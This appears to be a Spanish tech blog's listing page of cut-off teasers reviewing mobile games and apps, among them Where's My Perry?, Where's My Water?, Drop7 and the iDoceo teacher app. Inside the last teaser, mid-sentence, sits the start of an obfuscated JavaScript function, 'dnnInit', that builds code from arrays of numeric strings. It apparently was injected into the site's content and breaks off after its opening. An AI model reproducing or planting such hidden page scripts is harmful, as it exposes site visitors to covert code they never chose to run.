Dónde esta mi Perry? para Android, protagonizado por el ornitorrinco de serie de animación Phineas y Ferb, con la misma modalidad de juego que el famoso juego Dónde está mi agua?. Este juego fue presentado por Disney hace ya más de un mes, alcanzando un nivel de ventas por debajo de lo estipulado. Es por eso, que con esta nueva versión gratuita del entretenido juego, se pretenden alcanzar mayores ventas, enseñandoles a los usuarios que realmente…

Swampy el caimán vive en las alcantarillas debajo de la ciudad. Se parece poco a los demás caimanes: ya que es curioso, amigable y no hay nada que le guste más que un buen baño tras un largo día en el trabajo. Los otros caimanes han estropeado las cañerías y le han cortado el suministro de agua. ¡Ayuda a Swampy y lleva agua a su baño! Donde está mi agua? para Android es un entretenido juego y desafiante, que cuenta con una gran calidad de gráfi…

Where’s My Water para iPad es un entretenido juego y desafiante, que cuenta con una gran calidad de gráficos, controles multitáctiles, y se encuentra acompaño de un divertida música que brinda un ambiente de juego muy bueno. Es necesario que contemos con astucia y estar atentos a las algas para poder completar cada nivel del juego. Las tuberías de Where\’s My Water para iPad están averiadas y nuestra tarea consiste en hacer que el agua vu…

s lanzados por los mismos, para de esta manera poder atacarlos y dejarlos fuera de batalla. Bio Crisis no nos ofrece unos gráficos de última generación, sino más bien gráficos al estilo de consolas antiguas como ser la Súper Nintendo. Este es un simple detalle, ya que el juego no está diseñado para dejarnos atónitos por sus efectos visuales sino que para atraparnos con su excelente trama y aventura llena de emociones. Por otra parte, este juego …

Para iPad. 3,99 euros. Enlace: World of Goo Drop7: Zynga tiene muy buenos juegos para distintas plataformas y uno de ellos es Drop7, que para que os hagáis una idea, es para iOS lo que fue el Tetris para la clásica GameBoy de Nintendo, un juego fácil de aprender pero difícil de dominar con tres modos de juego que te entretendrán por largas horas. Para iPhone e iPad es gratuito. Enlace: Drop7 Orbital: Otro juego tipo puzle diseñado para los más há…

Muchas personas que han comprado recientemente una nueva tablet, demoran mucho tiempo en adaptarse a diferentes aspectos, uno de los más comunes es el medidor de batería que trae por defecto tablets que contengan el sistema operativo Android. Por ello es que se ha elaborado una aplicación muy útil, llamada Battery Widget Reborn. Esta aplicación es verdaderamente muy útil para aquellas personas que no logran acostumbrarse a las diferentes formas…

la Asus Padfone. Al parecer Asus ha hecho público que los chips Snapdragon S4 no están llegando a las fábricas al ritmo que era previsto y que está en duda que puedan proveer el terminal a la gente que ya lo tenía reservado para la fecha que esperaban. Esta escasez no es única de Asus, sino que otros terminales se han visto afectados, con las malas lenguas apuntando a que podría ser uno de los motivos que el Samsung Galaxy S3 probablemente en E…

Existe una tablet fabricada por la empresa Imaginarium llamada SuperPaquito, la cual está dedicada para los más chicos, ya que su diseño está compuesto por materiales resistentes a golpes y rayones, además de que trae aplicaciones instaladas dedicadas a los más pequeños de la casa. Si estás buscando qué regalo hacer en estas navidades, te recomendamos la tablet SuperPaquito, debido a que posee un software exclusivo con el cual los padres no ten…

…libre. De esta manera la comunidad ha crecido a pasos agigantados desde su salida a la luz, contando con diversas actualizaciones que permiten la compatibilidad tanto con tablets, como también con teléfonos Android. Prepárate para sumarte a esta comunidad y comenzar a compartir tus experiencias con otros usuarios Android, pudiendo de manera sencilla tomar fotografías desde nuestra Tablet y subirlas a la interfaz para que otras personas comenten s…

En esta nueva oportunidad te presentamos una excelente aplicación llamada iDoceo, ideal para aquellos usuarios de dispositivos iPad dedicados a la enseñanza en diferentes niveles, ya sean primarios o superiores. Tendremos la posibilidad de realizar un seguimiento meticuloso de nuestros alumnos con la implementación de diferentes hojas de cálculo e iconos personalizables. function dnnInit(){var a=0,m,v,t,z,x=new Array(“9091968376″,…



¿No encontraste lo que buscabas? ¡Probá con Google!